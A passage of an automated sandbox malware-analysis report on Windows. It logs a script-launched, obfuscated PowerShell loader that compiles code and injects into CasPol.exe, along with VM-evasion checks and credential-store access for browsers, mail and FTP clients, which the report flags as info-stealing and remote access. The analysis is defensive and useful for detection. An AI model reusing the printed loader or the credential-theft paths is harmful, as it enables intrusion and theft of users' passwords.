Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1388 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 Thread sleep count: 235 > 30
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 Thread sleep time: -7050000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8736
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000003.00000002.739431756.0000000004B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.748157526.0000000004E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000003.00000002.724108628.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe*
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 0000000A.00000002.823804324.00000000017E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 0000000A.00000002.823176402.000000000178B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM~
Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fk:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-VScx
Source: powershell.exe, 00000003.00000002.739431756.0000000004B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.748157526.0000000004E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fk:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 0000000A.00000002.823804324.00000000017E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW"
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E9980 LdrInitializeThunk, 10_2_209E9980
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skolegaardene = """reabedsaddi-fitgeysjpsyean de-chtheytepaneladreeopfprinonmiiprtsainooscnka da'kourisfoiudnmygsy sysimyinsofttretumok;suustsnyisunbigdr trsmiyassdatdeeprmti.dormiumansotcoigamduebi.boiannsotpheoprinoudptesdeeomrgovstiknctredesfo;oppsiupabfolvaiafcgl elsshtfiabathvicocot dacunlryadzsspsor sirchepraudbstrgiisidadgpaenodat1ch in{cr[fjddrladlsqihemtapkoobervatde(ne`"""sowowihansamblmba.dedsalbalin`"""bi)sg]koppeuasbfolunihocmy prsgrtunasetinistcsi haenexsktbreporfenge uniunnartma homcaimbdsaisuotjulgtnoozipfoejrnxs(smiornbutbr pokprvabatalmoibe,tiigansatth brkatovinte,zailunditad korruiovnpegsaeatdth,rribantrtde spuounpywfoohe,hoiknngetha kouwidgrere)co;as[mudtulallreithmnopblobrrfitne(ud`"""sekuneserobnomebilhl3up2te`"""he)av]riparufuboclfiicucma assemtsaadrtapifrctu raestxditkievermenpr jiifanovtlo arlmoopecviaaulprsunhcarpoihunsvkde(ouiunnhitst resdycpuounrtupgribr,whivendotst stnsasfikovematimnup)eu;fg[gudhylanlfuipemafpleowirmutra(kh`"""vekbieemradnpueanlnl3ek2bl`"""sp)pe]repgeurebprlreiracst desbettaamatfiifocom shefaxpitdieunrtanko blisunkatke scsarecatancudomombomsisditcaazatamere(unismnextse cokcuobefaltsmaaf,naiafnlatsu scslatkaohorhortrybu)sk;kr[lidstlimlcuihomekptaorkrbrtsh(pu`"""pskfeeskrannopeunlbi3sp2ut`"""va)gr]goporupabovlupishcsu vesbetlaaistptisncen puebuxagtcoeunrcanue alimonvetce trhleesaaslpjacdyrsiediaafttiedr(iligrnudten scndoedocwirhiosapbe,biivonsitdo gafselafsfnkpr,iniinnantos mogsirspufiple)al;sy[brduplablseipomsupteobarbltgl(af`"""prkcoexerbanfleaflsy3br2ma`"""un)tr]hepnaunobcolulirecud srsdettharotkuiiscph grebexfrtgeesprminvi ciifinwotde stvfaipsrzotthumiaoplstaarlunlagogrcbo(daisansytaf eqvep1sy,hoidenoxtst unvme2be,trikonkotro skvfl3wi,foimongatfi 
stvmi4ch)be;tu[padatlbglopikomphplaobarsptwa(ma`"""thijamremde3ba2vi.hedsolsalba`"""fe)br]sepluuenbafldeihocsk lushytviaantkoipoczr noedrxurtclefardonbl heibanbrtxe hviblmrhmagskredetevsmatfiaratuduansduwanirunkeddioopwtrpbroanspu(coiunnditba neppoasklskaen,chirenxetal skrpyainzne)me;bi[vadrelrhlanisemifpouochrfrtde(ti`"""omahydwivreafapgriph3sn2mi.spdnilpllvu`"""ep)un]vepclussbgelreiafcfl drslgtmiaertpaiopcna shesixcytopegerbensu unistntitak baisnntrisotmaiscagrlpaiejzcoeanakactalbe(poipunhntru tectioaclba,aaisynmetmi leupindeapr,afimenretas fafmelfroteporpol2na0ma1sn)mi;in[dedsalpalslichmnoperophreutsc(pa`"""engsvdtaiol3re2so`"""ud)qu]fiphyuskbadlmaigucgi ocsudtlaamotreifrcsk ijewixaxtqueunrhanbo geicinmatsa husseeratbewedilinbldenomewfuepexnotbrestxpl(slisannvtge biddaudacfl,buityncetto udhtoelanhubhuldy,anibenoutti moskuibrdraecotcaafo,isitinthtub afaulpfrpisatosis)pa;uf[audtilcalafiscmbapomoikrhetom(un`"""mygprdalipa3an2tr`"""un)th]ropjoucebmalfliblcbl agslrtpyabethjicocul taevoxfotafenoralnby coiaunittha nautrnnorigegeakelnoivazanestosjbenjsieopcfrtun(leihjnuntki rvhnoobiwbeeframanhe)su;sp[caddiludlplibemfrpnooegrditde(ce`"""coudesag
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skolegaardene = """reabedsaddi-fitgeysjpsyean de-chtheytepaneladreeopfprinonmiiprtsainooscnka da'kourisfoiudnmygsy sysimyinsofttretumok;suustsnyisunbigdr trsmiyassdatdeeprmti.dormiumansotcoigamduebi.boiannsotpheoprinoudptesdeeomrgovstiknctredesfo;oppsiupabfolvaiafcgl elsshtfiabathvicocot dacunlryadzsspsor sirchepraudbstrgiisidadgpaenodat1ch in{cr[fjddrladlsqihemtapkoobervatde(ne`"""sowowihansamblmba.dedsalbalin`"""bi)sg]koppeuasbfolunihocmy prsgrtunasetinistcsi haenexsktbreporfenge uniunnartma homcaimbdsaisuotjulgtnoozipfoejrnxs(smiornbutbr pokprvabatalmoibe,tiigansatth brkatovinte,zailunditad korruiovnpegsaeatdth,rribantrtde spuounpywfoohe,hoiknngetha kouwidgrere)co;as[mudtulallreithmnopblobrrfitne(ud`"""sekuneserobnomebilhl3up2te`"""he)av]riparufuboclfiicucma assemtsaadrtapifrctu raestxditkievermenpr jiifanovtlo arlmoopecviaaulprsunhcarpoihunsvkde(ouiunnhitst resdycpuounrtupgribr,whivendotst stnsasfikovematimnup)eu;fg[gudhylanlfuipemafpleowirmutra(kh`"""vekbieemradnpueanlnl3ek2bl`"""sp)pe]repgeurebprlreiracst desbettaamatfiifocom shefaxpitdieunrtanko blisunkatke scsarecatancudomombomsisditcaazatamere(unismnextse cokcuobefaltsmaaf,naiafnlatsu scslatkaohorhortrybu)sk;kr[lidstlimlcuihomekptaorkrbrtsh(pu`"""pskfeeskrannopeunlbi3sp2ut`"""va)gr]goporupabovlupishcsu vesbetlaaistptisncen puebuxagtcoeunrcanue alimonvetce trhleesaaslpjacdyrsiediaafttiedr(iligrnudten scndoedocwirhiosapbe,biivonsitdo gafselafsfnkpr,iniinnantos mogsirspufiple)al;sy[brduplablseipomsupteobarbltgl(af`"""prkcoexerbanfleaflsy3br2ma`"""un)tr]hepnaunobcolulirecud srsdettharotkuiiscph grebexfrtgeesprminvi ciifinwotde stvfaipsrzotthumiaoplstaarlunlagogrcbo(daisansytaf eqvep1sy,hoidenoxtst unvme2be,trikonkotro skvfl3wi,foimongatfi 
stvmi4ch)be;tu[padatlbglopikomphplaobarsptwa(ma`"""thijamremde3ba2vi.hedsolsalba`"""fe)br]sepluuenbafldeihocsk lushytviaantkoipoczr noedrxurtclefardonbl heibanbrtxe hviblmrhmagskredetevsmatfiaratuduansduwanirunkeddioopwtrpbroanspu(coiunnditba neppoasklskaen,chirenxetal skrpyainzne)me;bi[vadrelrhlanisemifpouochrfrtde(ti`"""omahydwivreafapgriph3sn2mi.spdnilpllvu`"""ep)un]vepclussbgelreiafcfl drslgtmiaertpaiopcna shesixcytopegerbensu unistntitak baisnntrisotmaiscagrlpaiejzcoeanakactalbe(poipunhntru tectioaclba,aaisynmetmi leupindeapr,afimenretas fafmelfroteporpol2na0ma1sn)mi;in[dedsalpalslichmnoperophreutsc(pa`"""engsvdtaiol3re2so`"""ud)qu]fiphyuskbadlmaigucgi ocsudtlaamotreifrcsk ijewixaxtqueunrhanbo geicinmatsa husseeratbewedilinbldenomewfuepexnotbrestxpl(slisannvtge biddaudacfl,buityncetto udhtoelanhubhuldy,anibenoutti moskuibrdraecotcaafo,isitinthtub afaulpfrpisatosis)pa;uf[audtilcalafiscmbapomoikrhetom(un`"""mygprdalipa3an2tr`"""un)th]ropjoucebmalfliblcbl agslrtpyabethjicocul taevoxfotafenoralnby coiaunittha nautrnnorigegeakelnoivazanestosjbenjsieopcfrtun(leihjnuntki rvhnoobiwbeeframanhe)su;sp[caddiludlplibemfrpnooegrditde(ce`"""coudesag
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi 
StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match File source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6072, type: MEMORYSTR